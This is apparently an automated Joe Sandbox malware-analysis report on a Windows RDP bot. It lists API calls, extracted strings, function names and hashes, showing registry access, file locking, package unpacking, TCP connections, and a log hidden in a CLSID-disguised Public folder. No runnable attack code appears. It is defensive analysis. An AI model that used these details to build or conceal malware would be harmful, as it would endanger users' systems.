1221->1230 1229 7ffe11ec9a07-7ffe11ec9a24 call 7ffe11ec2fd2 1222->1229 1222->1230 1226 7ffe11ec98bc-7ffe11ec98e1 call 7ffe11ec2fd2 1223->1226 1224->1226 1232 7ffe11ec9a29-7ffe11ec9a37 1225->1232 1245 7ffe11ec993b-7ffe11ec9941 1226->1245 1246 7ffe11ec98e3-7ffe11ec98e5 1226->1246 1233 7ffe11ec9b3b-7ffe11ec9b40 1227->1233 1234 7ffe11ec9ac0 1227->1234 1235 7ffe11ec979d-7ffe11ec97a1 1228->1235 1236 7ffe11ec9a82-7ffe11ec9a89 1228->1236 1229->1232 1233->1201 1241 7ffe11ec9aec-7ffe11ec9af3 1234->1241 1242 7ffe11ec9ac2-7ffe11ec9ac6 1234->1242 1243 7ffe11ec9aad-7ffe11ec9ab2 1235->1243 1244 7ffe11ec97a7-7ffe11ec97b5 1235->1244 1239 7ffe11ec9b1d-7ffe11ec9b22 1236->1239 1240 7ffe11ec9a8f-7ffe11ec9a94 1236->1240 1239->1201 1240->1201 1247 7ffe11ec9b59-7ffe11ec9b5e 1241->1247 1248 7ffe11ec9af5 1241->1248 1249 7ffe11ec9ac8 1242->1249 1250 7ffe11ec9b45-7ffe11ec9b4a 1242->1250 1243->1201 1244->1192 1255 7ffe11ec9947-7ffe11ec994d 1245->1255 1256 7ffe11ec9a3f-7ffe11ec9a44 1245->1256 1251 7ffe11ec9907-7ffe11ec990d 1246->1251 1252 7ffe11ec98e7-7ffe11ec98ea 1246->1252 1247->1201 1253 7ffe11ec9af7-7ffe11ec9afe 1248->1253 1254 7ffe11ec9b63-7ffe11ec9b68 1248->1254 1257 7ffe11ec9ace-7ffe11ec9ad6 1249->1257 1258 7ffe11ec9b4f-7ffe11ec9b54 1249->1258 1250->1201 1263 7ffe11ec9913-7ffe11ec9918 1251->1263 1264 7ffe11ec99b5-7ffe11ec99ba 1251->1264 1259 7ffe11ec98ec-7ffe11ec98f9 1252->1259 1260 7ffe11ec9931-7ffe11ec9936 1252->1260 1261 7ffe11ec9b6d-7ffe11ec9b72 1253->1261 1262 7ffe11ec9b00-7ffe11ec9b07 1253->1262 1254->1201 1265 7ffe11ec9977-7ffe11ec997d 1255->1265 1266 7ffe11ec994f-7ffe11ec9952 1255->1266 1256->1219 1267 7ffe11ec9ad8-7ffe11ec9add 1257->1267 1268 7ffe11ec9ae2-7ffe11ec9ae7 1257->1268 1258->1201 1259->1224 1260->1219 1261->1201 1271 7ffe11ec9b77-7ffe11ec9b7c 1262->1271 1272 7ffe11ec9b09-7ffe11ec9b0e 1262->1272 1263->1219 1264->1219 1269 7ffe11ec9a5a-7ffe11ec9a5f 1265->1269 1270 7ffe11ec9983-7ffe11ec9989 1265->1270 1273 7ffe11ec9a46-7ffe11ec9a4b 1266->1273 1274 7ffe11ec9958-7ffe11ec995b 1266->1274 1267->1201 1268->1201 1269->1219 1275 7ffe11ec9a64-7ffe11ec9a69 1270->1275 1276 7ffe11ec998f-7ffe11ec9995 1270->1276 1271->1201 1272->1201 1273->1219 1277 7ffe11ec9a50-7ffe11ec9a55 1274->1277 1278 7ffe11ec9961-7ffe11ec9967 1274->1278 1275->1219 1279 7ffe11ec999b-7ffe11ec99a1 1276->1279 1280 7ffe11ec9a6e-7ffe11ec9a73 1276->1280 1277->1219 1281 7ffe11ec9969-7ffe11ec996e 1278->1281 1282 7ffe11ec9970-7ffe11ec9975 1278->1282 1283 7ffe11ec99a7-7ffe11ec99ac 1279->1283 1284 7ffe11ec9a78-7ffe11ec9a7d 1279->1284 1280->1219 1281->1219 1282->1219 1283->1219 1284->1219
                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 00000015.00000002.2484854998.00007FFE11EC1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FFE11EC0000, based on PE: true
                  • Associated: 00000015.00000002.2484834641.00007FFE11EC0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                  • Associated: 00000015.00000002.2484885042.00007FFE11ED2000.00000002.00000001.01000000.0000000A.sdmpDownload File
                  • Associated: 00000015.00000002.2484904334.00007FFE11EDB000.00000004.00000001.01000000.0000000A.sdmpDownload File
                  • Associated: 00000015.00000002.2484920861.00007FFE11EDE000.00000004.00000001.01000000.0000000A.sdmpDownload File
                  • Associated: 00000015.00000002.2484937141.00007FFE11EDF000.00000008.00000001.01000000.0000000A.sdmpDownload File
                  • Associated: 00000015.00000002.2484954358.00007FFE11EE2000.00000002.00000001.01000000.0000000A.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_21_2_7ffe11ec0000_main.jbxd
                  Similarity
                  • API ID: OpenQueryValuefflushfwrite
                  • String ID: $ $(key != NULL)$(root != NULL)$(value != NULL)$(value_sz != NULL)$H:/Projects/rdp/bot/codebase/registry.c$NULL$P$P$[D] (%s) -> Done(root=0x%p,key=%s,param=%s)$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> Failed(root=0x%p,key=%s,param=%s,err=%08x)$[E] (%s) -> RegOpenKeyA failed(root=0x%p,key=%s,res=%lu)$[E] (%s) -> RegQueryValueA failed(root=0x%p,key=%s,param=%s,res=%lu)$registry_get_value
                  • API String ID: 1980715187-354652506
                  • Opcode ID: 4fa9bc14e8b7fe17cf5636f8bd777390257dfd3d450101781a440f926167c241
                  • Instruction ID: deea11fde9ea289ad861196eb6cd729d560ab9accdb0000eb1c8abfb74a78293
                  • Opcode Fuzzy Hash: 4fa9bc14e8b7fe17cf5636f8bd777390257dfd3d450101781a440f926167c241
                  • Instruction Fuzzy Hash: 89A12D2190CF4B91FB209BC7AC403FB625CAF00768ED811B2D95E066B1FE6DB985C342
                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 00000015.00000002.2483285777.00007FF76A901000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF76A900000, based on PE: true
                  • Associated: 00000015.00000002.2483271278.00007FF76A900000.00000002.00000001.01000000.00000008.sdmpDownload File
                  • Associated: 00000015.00000002.2483340862.00007FF76A910000.00000002.00000001.01000000.00000008.sdmpDownload File
                  • Associated: 00000015.00000002.2483552504.00007FF76A918000.00000004.00000001.01000000.00000008.sdmpDownload File
                  • Associated: 00000015.00000002.2483552504.00007FF76A91A000.00000004.00000001.01000000.00000008.sdmpDownload File
                  • Associated: 00000015.00000002.2483585321.00007FF76A91E000.00000002.00000001.01000000.00000008.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_21_2_7ff76a900000_main.jbxd
                  Similarity
                  • API ID: _errno$fclosefopenfwrite
                  • String ID: (mode != NULL)$(path != NULL)$H:/Projects/rdp/bot/codebase/fs.c$NULL$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> Failed(path=%s,mode=%s,err=%08x)$[E] (%s) -> fopen failed(path=%s,mode=%s,errno=%d)$[E] (%s) -> fwrite failed(path=%s,mode=%s,errno=%d)$[I] (%s) -> Done(path=%s,mode=%s,buf_sz=%llu)$fs_file_write
                  • API String ID: 608220805-961576452
                  • Opcode ID: d16384f81800e6e5c258ac0a5399fff4f4b3cea56f213a66df83229811587632
                  • Instruction ID: 790b391e98742f81b00fbd769fc2c84fb9ddb7291a5e50b7b3750fc2a8d425fe
                  • Opcode Fuzzy Hash: d16384f81800e6e5c258ac0a5399fff4f4b3cea56f213a66df83229811587632
                  • Instruction Fuzzy Hash: B6516A61A09742C9FB12BB58E9402B8A311AF547D4FF801BADA5D87294EE3DE956C320
                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 00000015.00000002.2484741717.00007FFE11501000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FFE11500000, based on PE: true
                  • Associated: 00000015.00000002.2484724506.00007FFE11500000.00000002.00000001.01000000.0000000D.sdmpDownload File
                  • Associated: 00000015.00000002.2484764263.00007FFE11513000.00000002.00000001.01000000.0000000D.sdmpDownload File
                  • Associated: 00000015.00000002.2484781987.00007FFE1151C000.00000004.00000001.01000000.0000000D.sdmpDownload File
                  • Associated: 00000015.00000002.2484799804.00007FFE1151F000.00000004.00000001.01000000.0000000D.sdmpDownload File
                  • Associated: 00000015.00000002.2484817525.00007FFE11520000.00000008.00000001.01000000.0000000D.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_21_2_7ffe11500000_main.jbxd
                  Similarity
                  • API ID: strlen$CreateDirectoryErrorLast$strcpy
                  • String ID: (path != NULL)$H:/Projects/rdp/bot/codebase/fs.c$NULL$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> CreateDirectoryA failed(path=%s,recursive=%d,gle=%lu)$[E] (%s) -> CreateDirectoryA failed(path=%s,recursive=%d,ptr=%s,gle=%lu)$[E] (%s) -> Failed(path=%s,recursive=%d,err=%08x)$[I] (%s) -> Done(path=%s,recursive=%d)$fs_dir_create
                  • API String ID: 1104438493-906809513
                  • Opcode ID: f99f7b159cb3390f3f5e0599ab982efe612358ae9b05b666bcd1237c7708f9f8
                  • Instruction ID: 98ee8fd73b96f8d9969d6311e7c201764c4a4893c92849739015088b126a9a69
                  • Opcode Fuzzy Hash: f99f7b159cb3390f3f5e0599ab982efe612358ae9b05b666bcd1237c7708f9f8
                  • Instruction Fuzzy Hash: 7A71C151F0CE8382FB218B97F4807BD2A4AAF44778F1611BAD90E476B5DF2CE9858301
                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 00000015.00000002.2483285777.00007FF76A901000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF76A900000, based on PE: true
                  • Associated: 00000015.00000002.2483271278.00007FF76A900000.00000002.00000001.01000000.00000008.sdmpDownload File
                  • Associated: 00000015.00000002.2483340862.00007FF76A910000.00000002.00000001.01000000.00000008.sdmpDownload File
                  • Associated: 00000015.00000002.2483552504.00007FF76A918000.00000004.00000001.01000000.00000008.sdmpDownload File
                  • Associated: 00000015.00000002.2483552504.00007FF76A91A000.00000004.00000001.01000000.00000008.sdmpDownload File
                  • Associated: 00000015.00000002.2483585321.00007FF76A91E000.00000002.00000001.01000000.00000008.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_21_2_7ff76a900000_main.jbxd
                  Similarity
                  • API ID: strlen$CountCriticalErrorHandleInitializeLastModuleSectionSpin_mbscatfopen
                  • String ID: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.log$Done$[E] (%s) -> Failed(err=%08x)$[E] (%s) -> InitializeCriticalSectionAndSpinCount(log_cs) failed(gle=%lu)$[E] (%s) -> Log open failed(flog_path=%s)$[I] (%s) -> %s$[I] (%s) -> Log open success(flog_path=%s)$debug_init$main.log$service
                  • API String ID: 3216678114-1460613360
                  • Opcode ID: 8572faeb7cbf65e028c6817cb6dc2f591a0c41e37ccd003476770f88f87aa09a
                  • Instruction ID: 859c9718f011e85a2cd8672eff467347d2533fef36422ccdd40d85fee306727d
                  • Opcode Fuzzy Hash: 8572faeb7cbf65e028c6817cb6dc2f591a0c41e37ccd003476770f88f87aa09a
                  • Instruction Fuzzy Hash: 82513D90E0C713C9FB25B715E9803B8B291AF557C8FF441BAD60EC6292DE6CAD46C361
                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 00000015.00000002.2483285777.00007FF76A901000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF76A900000, based on PE: true
                  • Associated: 00000015.00000002.2483271278.00007FF76A900000.00000002.00000001.01000000.00000008.sdmpDownload File
                  • Associated: 00000015.00000002.2483340862.00007FF76A910000.00000002.00000001.01000000.00000008.sdmpDownload File
                  • Associated: 00000015.00000002.2483552504.00007FF76A918000.00000004.00000001.01000000.00000008.sdmpDownload File
                  • Associated: 00000015.00000002.2483552504.00007FF76A91A000.00000004.00000001.01000000.00000008.sdmpDownload File
                  • Associated: 00000015.00000002.2483585321.00007FF76A91E000.00000002.00000001.01000000.00000008.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_21_2_7ff76a900000_main.jbxd
                  Similarity
                  • API ID: strlen$_errno_mbscpy$_mbscatfopenfseek
                  • String ID: %TEMP%$(package != NULL)$(target != NULL)$H:/Projects/rdp/bot/codebase/package.c$NULL$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> Entry unpack failed(package=%s,target=%s,pkg_ent=%s,pkg_ent_sz=%u,err=%08x)$[E] (%s) -> Failed(package=%s,target=%s,err=%08x)$[I] (%s) -> Done(package=%s,target=%s)$[I] (%s) -> Entry unpack done(package=%s,target=%s,pkg_ent=%s,pkg_ent_sz=%u)$package_unpack
                  • API String ID: 3066828623-625159688
                  • Opcode ID: 3b16de36214f63a5e655afca7bb3e453d61e8214601823133892528394a6a068
                  • Instruction ID: f33561a5ca60d6d12eda25e1a996fe877ff81067f8726adfe5e192c580ab3199
                  • Opcode Fuzzy Hash: 3b16de36214f63a5e655afca7bb3e453d61e8214601823133892528394a6a068
                  • Instruction Fuzzy Hash: 1B818161A0CB43D5FB51AB25E8403AAE760FB447D4FE441B6EA4DC7285EE7CE906C720
                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 00000015.00000002.2483285777.00007FF76A901000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF76A900000, based on PE: true
                  • Associated: 00000015.00000002.2483271278.00007FF76A900000.00000002.00000001.01000000.00000008.sdmpDownload File
                  • Associated: 00000015.00000002.2483340862.00007FF76A910000.00000002.00000001.01000000.00000008.sdmpDownload File
                  • Associated: 00000015.00000002.2483552504.00007FF76A918000.00000004.00000001.01000000.00000008.sdmpDownload File
                  • Associated: 00000015.00000002.2483552504.00007FF76A91A000.00000004.00000001.01000000.00000008.sdmpDownload File
                  • Associated: 00000015.00000002.2483585321.00007FF76A91E000.00000002.00000001.01000000.00000008.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_21_2_7ff76a900000_main.jbxd
                  Similarity
                  • API ID: strlen$Heap_mbscpy$AllocFreeHandleLibraryModuleProcess
                  • String ID: [E] (%s) -> Failed(name=%s,err=%08x)$[E] (%s) -> Memory allocation failed(size=%llu)$[I] (%s) -> Done(name=%s)$[I] (%s) -> Loaded(f_path=%s)$mem_alloc$unit_cleanup$unit_init$units_init
                  • API String ID: 548194777-214984806
                  • Opcode ID: b2c2cea6912c1b1f2574cd6c8e849d591c52afe02a31096945dcbd55e0072092
                  • Instruction ID: 81e8af0487b9fb8846bcc45c5bd97a4a58635c40e229cdc5a6905f5eb744c9c2
                  • Opcode Fuzzy Hash: b2c2cea6912c1b1f2574cd6c8e849d591c52afe02a31096945dcbd55e0072092
                  • Instruction Fuzzy Hash: 0D816B61B08743C5FA69BB11A4403BAF2A1AF447C8FE480B9DA4D87795DF3CE905C320
                  APIs
                  • CreateFileA.KERNEL32(?,?,?,?,?,?,?,?,?,service,000001DE38FB13D0,?,00007FF76A9184F0,00007FF76A9084E9), ref: 00007FF76A903DD9
                  • LockFileEx.KERNEL32(?,?,?,?,?,?,?,?,?,service,000001DE38FB13D0,?,00007FF76A9184F0,00007FF76A9084E9), ref: 00007FF76A903E12
                  • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,service,000001DE38FB13D0,?,00007FF76A9184F0,00007FF76A9084E9), ref: 00007FF76A903EE7
                  • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,service,000001DE38FB13D0,?,00007FF76A9184F0,00007FF76A9084E9), ref: 00007FF76A903FCC
                  • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,service,000001DE38FB13D0,?,00007FF76A9184F0,00007FF76A9084E9), ref: 00007FF76A904140
                  Strings
                  Memory Dump Source
                  • Source File: 00000015.00000002.2483285777.00007FF76A901000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF76A900000, based on PE: true
                  • Associated: 00000015.00000002.2483271278.00007FF76A900000.00000002.00000001.01000000.00000008.sdmpDownload File
                  • Associated: 00000015.00000002.2483340862.00007FF76A910000.00000002.00000001.01000000.00000008.sdmpDownload File
                  • Associated: 00000015.00000002.2483552504.00007FF76A918000.00000004.00000001.01000000.00000008.sdmpDownload File
                  • Associated: 00000015.00000002.2483552504.00007FF76A91A000.00000004.00000001.01000000.00000008.sdmpDownload File
                  • Associated: 00000015.00000002.2483585321.00007FF76A91E000.00000002.00000001.01000000.00000008.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_21_2_7ff76a900000_main.jbxd
                  Similarity
                  • API ID: ErrorFileLast$CloseCreateHandleLock
                  • String ID: (lock != NULL)$(path != NULL)$H:/Projects/rdp/bot/codebase/fs.c$NULL$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> CreateFileA failed(path=%s,gle=%lu)$[E] (%s) -> Failed(path=%s,err=%08x)$[E] (%s) -> LockFileEx failed(path=%s,gle=%lu)$[I] (%s) -> Done(path=%s,lock=%p)$fs_file_lock$service
                  • API String ID: 2747014929-3958755462
                  • Opcode ID: bbb9af8f6e22d2aadefb0d8fcd95e22d4364630c4fe98b87d8be9db23a09308d
                  • Instruction ID: 28c74ebcbcf906d81eae70ffbe16dee84a866593e73f9fc05011521a6febccea
                  • Opcode Fuzzy Hash: bbb9af8f6e22d2aadefb0d8fcd95e22d4364630c4fe98b87d8be9db23a09308d
                  • Instruction Fuzzy Hash: A3818410E0C70BC6F731BB25B540779E1609F613D4EF402BAC96EC66D1EE2EAD858721
                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 00000015.00000002.2484741717.00007FFE11501000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FFE11500000, based on PE: true
                  • Associated: 00000015.00000002.2484724506.00007FFE11500000.00000002.00000001.01000000.0000000D.sdmpDownload File
                  • Associated: 00000015.00000002.2484764263.00007FFE11513000.00000002.00000001.01000000.0000000D.sdmpDownload File
                  • Associated: 00000015.00000002.2484781987.00007FFE1151C000.00000004.00000001.01000000.0000000D.sdmpDownload File
                  • Associated: 00000015.00000002.2484799804.00007FFE1151F000.00000004.00000001.01000000.0000000D.sdmpDownload File
                  • Associated: 00000015.00000002.2484817525.00007FFE11520000.00000008.00000001.01000000.0000000D.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_21_2_7ffe11500000_main.jbxd
                  Similarity
                  • API ID: ErrorLast$setsockopt$connecthtonlhtonsioctlsocketselectsocket
                  • String ID: [E] (%s) -> connect failed(sock=0x%llx,host=%08x,port=%u,WSAgle=%d)$[E] (%s) -> connection failed(host=%08x,port=%u)$[E] (%s) -> select failed(sock=0x%llx,WSAgle=%d)$[E] (%s) -> socket failed(host=%08x,port=%u,WSAgle=%d)$[I] (%s) -> Done(sock=0x%llx,host=%08x,port=%u)$[W] (%s) -> select timedout(sock=0x%llx,timeo=%u)$tcp_connect
                  • API String ID: 3154682637-708158336
                  • Opcode ID: 6dd717ab170c5fe0b15f106b9b85e8e896ef29de69d360d4987659121abb25b2
                  • Instruction ID: 78a83b701d6f23120a828b067069fc48b46906f037840e619646d6407660e4a5
                  • Opcode Fuzzy Hash: 6dd717ab170c5fe0b15f106b9b85e8e896ef29de69d360d4987659121abb25b2
                  • Instruction Fuzzy Hash: 30511762A0CE4341E7609B97E8502BD775AAF457B0F0403BAD92E476F6EF7CE5458301
                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 00000015.00000002.2484609499.00007FFE0EB41000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FFE0EB40000, based on PE: true
                  • Associated: 00000015.00000002.2484591156.00007FFE0EB40000.00000002.00000001.01000000.0000000E.sdmpDownload File
                  • Associated: 00000015.00000002.2484635439.00007FFE0EB56000.00000002.00000001.01000000.0000000E.sdmpDownload File
                  • Associated: 00000015.00000002.2484666608.00007FFE0EB60000.00000004.00000001.01000000.0000000E.sdmpDownload File
                  • Associated: 00000015.00000002.2484687240.00007FFE0EB63000.00000004.00000001.01000000.0000000E.sdmpDownload File
                  • Associated: 00000015.00000002.2484704200.00007FFE0EB64000.00000008.00000001.01000000.0000000E.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_21_2_7ffe0eb40000_main.jbxd
                  Similarity
                  • API ID: ErrorLast$setsockopt$connecthtonlhtonsioctlsocketselectsocket
                  • String ID: [E] (%s) -> connect failed(sock=0x%llx,host=%08x,port=%u,WSAgle=%d)$[E] (%s) -> connection failed(host=%08x,port=%u)$[E] (%s) -> select failed(sock=0x%llx,WSAgle=%d)$[E] (%s) -> socket failed(host=%08x,port=%u,WSAgle=%d)$[I] (%s) -> Done(sock=0x%llx,host=%08x,port=%u)$[W] (%s) -> select timedout(sock=0x%llx,timeo=%u)$tcp_connect
                  • API String ID: 3154682637-708158336
                  • Opcode ID: b1d6f88f48f977056472bc5e2fc88cb5e718e3b35a49b9fbb396dfdf92b66e85
                  • Instruction ID: 343caa97ffda4bfe0f4221d2e56de9c1578514f95bf3b53fc5566dca7af5dcf2
                  • Opcode Fuzzy Hash: b1d6f88f48f977056472bc5e2fc88cb5e718e3b35a49b9fbb396dfdf92b66e85
                  • Instruction Fuzzy Hash: 2E51C2A2A0DB4642EA349F59E8003B97761EF84764F041336E8EE466F5DE7CE5458F00
                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 00000015.00000002.2484499625.00007FFE0E161000.00000020.00000001.01000000.00000010.sdmp, Offset: 00007FFE0E160000, based on PE: true
                  • Associated: 00000015.00000002.2484478122.00007FFE0E160000.00000002.00000001.01000000.00000010.sdmpDownload File
                  • Associated: 00000015.00000002.2484520770.00007FFE0E174000.00000002.00000001.01000000.00000010.sdmpDownload File
                  • Associated: 00000015.00000002.2484539782.00007FFE0E17D000.00000004.00000001.01000000.00000010.sdmpDownload File
                  • Associated: 00000015.00000002.2484557065.00007FFE0E180000.00000004.00000001.01000000.00000010.sdmpDownload File
                  • Associated: 00000015.00000002.2484573253.00007FFE0E181000.00000008.00000001.01000000.00000010.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_21_2_7ffe0e160000_main.jbxd
                  Similarity
                  • API ID: ErrorLast$setsockopt$connecthtonlhtonsioctlsocketselectsocket
                  • String ID: [E] (%s) -> connect failed(sock=0x%llx,host=%08x,port=%u,WSAgle=%d)$[E] (%s) -> connection failed(host=%08x,port=%u)$[E] (%s) -> select failed(sock=0x%llx,WSAgle=%d)$[E] (%s) -> socket failed(host=%08x,port=%u,WSAgle=%d)$[I] (%s) -> Done(sock=0x%llx,host=%08x,port=%u)$[W] (%s) -> select timedout(sock=0x%llx,timeo=%u)$tcp_connect
                  • API String ID: 3154682637-708158336
                  • Opcode ID: 38dbff91742fcd545e8c6506307d99f0f3ef583879267fb3d588f94e721ee5a1
                  • Instruction ID: 1aa727a16737b71545cb7ab8ea98d08a4113c5f9cb354e424e22e7b6f591b79d
                  • Opcode Fuzzy Hash: 38dbff91742fcd545e8c6506307d99f0f3ef583879267fb3d588f94e721ee5a1
                  • Instruction Fuzzy Hash: B251C271A0C65742F6605B25E8002B97761AF85B64F14033BE9FE46AF6EE7CE545C700
                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 00000015.00000002.2484854998.00007FFE11EC1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FFE11EC0000, based on PE: true
                  • Associated: 00000015.00000002.2484834641.00007FFE11EC0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                  • Associated: 00000015.00000002.2484885042.00007FFE11ED2000.00000002.00000001.01000000.0000000A.sdmpDownload File
                  • Associated: 00000015.00000002.2484904334.00007FFE11EDB000.00000004.00000001.01000000.0000000A.sdmpDownload File
                  • Associated: 00000015.00000002.2484920861.00007FFE11EDE000.00000004.00000001.01000000.0000000A.sdmpDownload File
                  • Associated: 00000015.00000002.2484937141.00007FFE11EDF000.00000008.00000001.01000000.0000000A.sdmpDownload File
                  • Associated: 00000015.00000002.2484954358.00007FFE11EE2000.00000002.00000001.01000000.0000000A.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_21_2_7ffe11ec0000_main.jbxd
                  Similarity
                  • API ID: ErrorLast$setsockopt$connecthtonlhtonsioctlsocketselectsocket
                  • String ID: [E] (%s) -> connect failed(sock=0x%llx,host=%08x,port=%u,WSAgle=%d)$[E] (%s) -> connection failed(host=%08x,port=%u)$[E] (%s) -> select failed(sock=0x%llx,WSAgle=%d)$[E] (%s) -> socket failed(host=%08x,port=%u,WSAgle=%d)$[I] (%s) -> Done(sock=0x%llx,host=%08x,port=%u)$[W] (%s) -> select timedout(sock=0x%llx,timeo=%u)$tcp_connect
                  • API String ID: 3154682637-708158336
                  • Opcode ID: 222b07809e3b9db459ce9512d8b192219b874d6750c4ceaa7239dbf5f75ae640
                  • Instruction ID: b9097e6164efb9656990e9356f9a0176365719b3c785ee01ecd908b818073293
                  • Opcode Fuzzy Hash: 222b07809e3b9db459ce9512d8b192219b874d6750c4ceaa7239dbf5f75ae640
                  • Instruction Fuzzy Hash: 5351A121A0CE4382EB209FA6EC403BB6658AF84774F9423B5E82D466F5DF7DF4458700
                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 00000015.00000002.2484741717.00007FFE11501000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FFE11500000, based on PE: true
                  • Associated: 00000015.00000002.2484724506.00007FFE11500000.00000002.00000001.01000000.0000000D.sdmpDownload File
                  • Associated: 00000015.00000002.2484764263.00007FFE11513000.00000002.00000001.01000000.0000000D.sdmpDownload File
                  • Associated: 00000015.00000002.2484781987.00007FFE1151C000.00000004.00000001.01000000.0000000D.sdmpDownload File
                  • Associated: 00000015.00000002.2484799804.00007FFE1151F000.00000004.00000001.01000000.0000000D.sdmpDownload File
                  • Associated: 00000015.00000002.2484817525.00007FFE11520000.00000008.00000001.01000000.0000000D.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_21_2_7ffe11500000_main.jbxd
                  Similarity
                  • API ID: ErrorLast$CountCreateCriticalInitializeSectionSpinThreadfflushfwrite
                  • String ID: $ $Done$P$P$[E] (%s) -> CreateThread(routine_rx) failed(gle=%lu)$[E] (%s) -> Failed(err=%08x)$[E] (%s) -> InitializeCriticalSectionAndSpinCount(cs_subscribers) failed(gle=%lu)$[I] (%s) -> %s$ebus_init$~$~
                  • API String ID: 1412730629-3633878399
                  • Opcode ID: ba1aa4412896bc89a187ec3b5d5457ba12ff61863d0a71a2540dd986885492dd
                  • Instruction ID: c26af020cb648a11fe49cf63d07a0879afe32f0580b4dab46ca7bde4a9f3cf10
                  • Opcode Fuzzy Hash: ba1aa4412896bc89a187ec3b5d5457ba12ff61863d0a71a2540dd986885492dd
                  • Instruction Fuzzy Hash: D351F761A0CF0392FB61A797A4C437C365A9F14374F6407BAC53E462F1DE6DE9858212
                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 00000015.00000002.2484609499.00007FFE0EB41000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FFE0EB40000, based on PE: true
                  • Associated: 00000015.00000002.2484591156.00007FFE0EB40000.00000002.00000001.01000000.0000000E.sdmpDownload File
                  • Associated: 00000015.00000002.2484635439.00007FFE0EB56000.00000002.00000001.01000000.0000000E.sdmpDownload File
                  • Associated: 00000015.00000002.2484666608.00007FFE0EB60000.00000004.00000001.01000000.0000000E.sdmpDownload File
                  • Associated: 00000015.00000002.2484687240.00007FFE0EB63000.00000004.00000001.01000000.0000000E.sdmpDownload File
                  • Associated: 00000015.00000002.2484704200.00007FFE0EB64000.00000008.00000001.01000000.0000000E.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_21_2_7ffe0eb40000_main.jbxd
                  Similarity
                  • API ID: ErrorLast$CountCreateCriticalInitializeSectionSpinThreadfflushfwrite
                  • String ID: $ $Done$P$P$[E] (%s) -> CreateThread(routine_rx) failed(gle=%lu)$[E] (%s) -> Failed(err=%08x)$[E] (%s) -> InitializeCriticalSectionAndSpinCount(cs_subscribers) failed(gle=%lu)$[I] (%s) -> %s$ebus_init$~$~
                  • API String ID: 1412730629-3633878399
                  • Opcode ID: 3d1ab3aa8f4161a05aa8dfdd1c0cce3f996ef00871ce4195b1a1b84c650aac4e
                  • Instruction ID: b13b76025f1c92d6c42aac831637d9bcd072b238c26446a8178e8eeab5ea1d2a
                  • Opcode Fuzzy Hash: 3d1ab3aa8f4161a05aa8dfdd1c0cce3f996ef00871ce4195b1a1b84c650aac4e
                  • Instruction Fuzzy Hash: 5B5124A1B0C70782FB309F54A8843792290EF14375F242336CAEE472F5DE6DA8859E52
                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 00000015.00000002.2484499625.00007FFE0E161000.00000020.00000001.01000000.00000010.sdmp, Offset: 00007FFE0E160000, based on PE: true
                  • Associated: 00000015.00000002.2484478122.00007FFE0E160000.00000002.00000001.01000000.00000010.sdmpDownload File
                  • Associated: 00000015.00000002.2484520770.00007FFE0E174000.00000002.00000001.01000000.00000010.sdmpDownload File
                  • Associated: 00000015.00000002.2484539782.00007FFE0E17D000.00000004.00000001.01000000.00000010.sdmpDownload File
                  • Associated: 00000015.00000002.2484557065.00007FFE0E180000.00000004.00000001.01000000.00000010.sdmpDownload File
                  • Associated: 00000015.00000002.2484573253.00007FFE0E181000.00000008.00000001.01000000.00000010.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_21_2_7ffe0e160000_main.jbxd
                  Similarity
                  • API ID: ErrorLast$CountCreateCriticalInitializeSectionSpinThreadfflushfwrite
